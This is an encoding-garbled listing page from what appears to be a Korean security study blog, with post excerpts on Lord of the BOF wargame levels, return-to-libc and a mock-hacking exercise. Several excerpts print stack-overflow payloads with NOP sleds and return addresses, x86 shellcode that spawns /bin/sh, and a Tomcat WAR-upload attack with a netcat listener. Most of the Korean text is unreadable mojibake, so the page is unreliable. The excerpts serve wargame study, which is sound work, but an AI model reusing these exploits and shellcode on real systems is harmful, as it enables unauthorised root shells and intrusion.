728x90 ๋ฐ์ํ ์ ์ฒด ๊ธ284 LOB orc cp๋ช ๋ น์ด ๊ฐ์ ๊ฑด ๋ฌด์ํ๊ณ ๋ค์ ์ ์์ ํ์ฌ ๋ฌธ์ ๋ฅผ ํ๋ฉด orc.c๋ฅผ ์ด์ด๋ณด๋ฉด buffer๊ฐ 40์ด๊ณ ๋ฆฌํด๊ฐ์ด \xbf๊ฐ ๊ผญ ๋ค์ด๊ฐ์ผ ํ๋ค๊ณ ๋์จ๋ค. gdb๋ฅผ ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋ฉ์ธ์ ๋ธ๋ ์ดํฌํฌ์ธํธ๋ฅผ ๊ฑธ๊ณ r $(python -c 'print "\x90"*100์ ์ ๋ ฅํ์ฌ esp๊ฐ์ ๋ฐ๊พธ์๋ค.๊ทธํ x/100 $esp๋ก ๊ฐ์ ํ์ธํ๋ฉด 90909090๋ค์ด๊ฐ ์๋ ์ฃผ์๋ฅผ ๋ณผ์ ์๋ค. payload๋ฅผ ์์ฑํด๋ณด๋ฉด ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret ์ฃผ์๊ฐ)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68.. Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB goblin ์ ์์ ํ๊ณ (cp ๊ฐ์ ๊ฒ์ ๋ฌด์ํ๊ฒ ์ต๋๋ค) ์์ค๋ฅผ ํ์ธ ํ๋ฉด ์ด๋ฒ์ ๋ํ buffer๊ฐ 16์ธ๊ฒ์ ํ์ธ ํ ์์๋ค.๋จผ์ vi ๋ฅผ ์ด์ฉํ์ฌ ํ๋ก๊ทธ๋๋ฐ GOGO!! ์์๊ฐ์ด #include #include int main(int argc, char *argv[]){long shell;shell = system ์ฃผ์๊ฐ;๋๋จธ์ง๋ ๋์ผ ํ๊ฒ ํ๋ก๊ทธ๋๋ฐ์ ํ๊ณ gcc๋ฅผ ์ด์ฉํด ์ปดํ์ผ์ ํ๋ค. ์ด์ system ์ฃผ์๊ฐ์ ๋ณด๊ธฐ์ํด gdb๋ฅผ ์ด์ฉํด ๋ค์ด๊ฐํ b main๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋ฉ์ธ์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑด๋ค.๊ทธํ p system์ด๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ system ์ฃผ์๊ฐ์ ํ์ธํ๋ค.(ํ๋ก๊ทธ๋๋ฐํ ๋ ์ ๋ ฅํด์ผํจ) ์ด์ payload๋ฅผ ์ง๋ณด๋ฉด (python -c 'print "\x90"*20+"AAAAA(ebp+8.. Wargame/CTF(Capture The Flag) 2015. 9. 15. system /bin/sh ์ฃผ์ ์ฐพ๊ธฐ #include #include int main(int argc,char *argv[]) {long shell;shell = ์์คํ ์ฃผ์;while(memcmp((void*)shell,("/bin/sh"),8)) shell++;printf("%p\n",shell);} Security Study/System 2015. 9. 15. network base 64 = 64์ง์๋ฏธ๋ฆฌ base 64 ์์ธํ๋ฅผ ๊ตฌ์ฑํด์ ธ์์ผ๋ฉฐ 6bit์ฉ ๋๋ ํฌํจํ๋ค.base 64 ๋ ๋์๋ฌธ์๊ฐ ๊ตฌ๋ณ๋์ด์๋ค.๋๋ฉ์ธ ๋ค์์ ์ฌ๋ฌ๊ฐ์ ๋๋ฉ์ธ ๋ผ๋ฒจ๋ก ๊ตฌ์ฑ๋์ด์๋ค. ํฐ๋ ํจํท์ ์ ํจํทethernet+ip+don't care ํฐ๋ ํจํทethernet+ip+udp(53)+dns+encoded payload Security Study/Network 2015. 9. 14. LOB gremlin gate์ ๋ง์ฐฌ๊ฐ์ง๋ก cp๋ช ๋ น์ด๋ฅผ ์คํํ์ฌ ํ์ผ์ ๋ณต์ฌํ๋ค. ๊ทธํ gremlin.c๋ฅผ ์ด์ด ๋ณด๋ฉด 16์ด๋ผ๋ buffer๋ก small buffer๋ผ๋ ๊ฒ์ ์์ ์๋ค.๊ทธํ gdb๋ฅผ ์ด์ฉํ์ฌ ๋ณด๋ฉด sub 0x10์ ๊ฐ์ ํ์ธํด๋ณด๋ฉด 16์ด๋ผ๋ ๊ฒ์ผ๋ก dummy ๊ฐ์ด ์๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค. 16๋ฐ์ดํธ๋ฅผ ํ๋ณดํ๋ ๊ฒ์ผ๋ก ๋ณด์ด๋ฏ๋ก main+3์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑด๋ค. ๊ทธ๋ฆฌ๊ณ ํ๋ก๊ทธ๋จ ์คํ ๋์์ ์ธ์๊ฐ ์ ๋ฌ๋๋ฏ๋ก argv[2]์ ์์น๋ฅผ ์์๋ณด๊ธฐ์ํด $(python -c 'print "\x90(buffer+sfp๊ฐ)"*20+"BBBB(ret์ ๋ฎ์ด์จ์ผํ ์ฃผ์ ๊ฐ๋ค์ด๊ฐ ์์น"') $(python -c 'print "A"*241"")์ ๋ฃ๋๋ค 0x42424242๊ฐ ret์์น๋ก ๋ฎ์ด์จ์ผํ๋ฏ๋ก ๋์ถฉ 414141414.. Wargame/CTF(Capture The Flag) 2015. 9. 14. LOB gate LOB gate๋ก ์ ์์ ํ๋ฉด gate์ gate๋ก ์ ์๊ฐ๋ฅํ๋ค. ์ ์ํ ํ์ธ ํ๋ฉด ํ์ผ์ด 3๊ฐ์๋ ๊ฒ์ด ํ์ธ๊ฐ๋ฅ ํ๋ค ๋จผ์ cp ๋ช ๋ น์ ์ด์ฉํ์ฌ gremlin์ ๊ถํ์ด ์์ด gdb ๋ ๋ชปํ๋ ๋ฌธ์ ๋ฅผ ํด๊ฒฐํ์ !cp๋ช ๋ น์ด๋ ํ์ผ์ ๋ณต์ฌํ๋ ๋ช ๋ น์ด์ด๋ค. ํ์ผ์ ๋ณต์ฌํ๊ณ gremlin.c ๋ฅผ ์ด์ด๋ณด๋ฉด strcpy์์ ๋ฌธ์ ๊ฐ ๋ฐ์ํ๋ ๊ฒ์ ๋ณผ์ ์๋ค.ํ์ด๋ก๋๋ฅผ ์๊ฐ ํด๋ณด๋ฉด ์ผ๋จ buffer 260(256+sfp)+shellcode+ret์ฃผ์(buffer์ฃผ์)๋ฅผ ๋ฃ์ด์ผํ๋ค. gdb๋ก ํ์ธ์ ํด๋ณด๋ฉด strcpy๋ค์์์ ์ผ์ด๋๋ b *main+59์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑธ๊ณ r $(python -c 'print "\x90"*200(์์์ ๊ฐ)')์ ๋ฃ๊ณ x/100x $esp ๋ก esp๊ฐ์ ํ์ธ ํ๋ฉด 0x9090909.. Wargame/CTF(Capture The Flag) 2015. 9. 14. system 2 gdb์์์์ blocking ํจ์ ์ ๋ ฅ r Security Study/System 2015. 9. 13. system 1์ผ์ฐจ buf[248] + sfp[4] + ret ulimit -s unlimited //์คํํฌ๊ธฐ๋ฅผ ๋ฌดํ์ ์ผ๋ก ๋๋ ค ASLR์ด ์ ์ฉ์๋จ system,execve - ebp+8์์น์์๋๊ฒ์ ์ธ์๋ก๋ฐ์ buf[248] + sfp [4] + ์กฐ์(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system์ฃผ์ ๊ตฌํ๊ธฐ p exit - exit๊ตฌํ๊ธฐ find &system,+9999999,"/bin/sh" - /bin/sh์ฃผ์ ๊ตฌํ๊ธฐ ./filename $(python -c 'print "A"*๋ฒํผ+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp.. Security Study/System 2015. 9. 12. ๋ชจ์ํดํน์ด๋ ๋ฌด์์ธ๊ฐ? ์ ์์์ ๋ง๋จ title : ์ต์ฐ ๋ํฅ ํ์ ์ ํตํ ๊ณต๊ฒฉ๊ธฐ๋ฒ ์ดํด ---------------------------------------------------------------------------------------------- ์ต์ ์ทจ์ฝ์ ๋ฏธํจ์น?os, ์ดํ๋ฆฌ์ผ์ด์ ๋ฑ์์ ๋ฐ๊ฒฌ๋๊ณ ์๋ ์ทจ์ฝ์ ์ ์ฃผ๊ธฐ์ ์ ํจ์นํ์ง ์์์ผ๋ก์จ, ์์คํ ๋ฐ ๊ฐ์ธ PC์ ์ฌ๊ฐํ ์ํฅ์ ์ค์ ์๋ ์ทจ์ฝ์ ๋ชจ์ ํดํน์ ํ๋ค๋ณด๋ฉด web์ ์ค์ ์ ๋์ ๋ฐ์ ์๋ค. 1) ์ทจ์ฝ์ ๊ณต๊ฒฉ์ฌ๋ก1-1)tomcat๊ด๋ฆฌ์ ํ์ด์ง ์ทจ์ฝ์ (8180 metasplotable) => ์ถ์ธก ๊ณต๊ฒฉ(๋ชจ๋ ๋ต์ page์์)war file -> jar cvf test.war .file upload ์ทจ์ฝ์ uploadํ๊ณ ์ปค๋งจ๋ ์ฐฝ์ ์ฐ๋ค.nc -lvp 12345 ๋ฅผ .. My Story 2015. 9. 11. windows 10 (microsoft) ๊ณผ๊ฑฐ - ์ฌ๋์ด ์ปดํจํฐ์๋ ๊ณณ์ผ๋ก ์ฐพ์๋ค๋ํ์ฌ - ์ฌ๋์ผ๋ก ๋ถํฐ ๊ฐ์ฅ ๊ฐ๊น์ด ์๋ ์ฅ์น๋ก ์ธํ์ฌ ์ฌ์ฉํ๊ณ ๊บผ๋ฒ๋ฆผ(์๋นํ๋ ๊ฐ๋ ) windows 7 - ๋ง์ฐ์ค์ ํค๋ณด๋์ ์ ์ํ์ฌ windows 8์ด ๋์์ ๋ ์ ์ํ๊ธฐ๊ฐ ํ๋ฌwindows 8 - start button, shutdown button ๋๊ฐ์ง์ ๋ฌธ์ ์ ์ด ๋ฐ์ windows 10 - ๋๊ฐ์ง์ ๋ฌธ์ ์ ์ ํ๋ฒ์ ํด๊ฒฐwindows 10 - 10๋ถํฐ๋ computer ๋ฟ๋ง์๋๋ผ phone์์๋ ์ฌ์ฉ ๊ฐ๋ฅ(์ฑ ํธํ) windows 10 - music, camera, media, mail, edge(internet browser)windows 10 - mobility, more personal, more productivity, one more thing .. My Story 2015. 9. 10. ์ฌ๋ฌ๊ฐ์ง ์ฝ๋ฉ์ฌ์ดํธ http://www.tutorialspoint.com/codingground.htm My Story 2015. 9. 10. system shellcode // 16 Byte, setreuid( geteuid() , geteuid() );\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 // 25 Byte, shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 Byte\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0.. Security Study/System 2015. 9. 10. ์ด์ 1 ยทยทยท 18 19 20 21 22 23 24 ๋ค์ 728x90 ๋ฐ์ํ
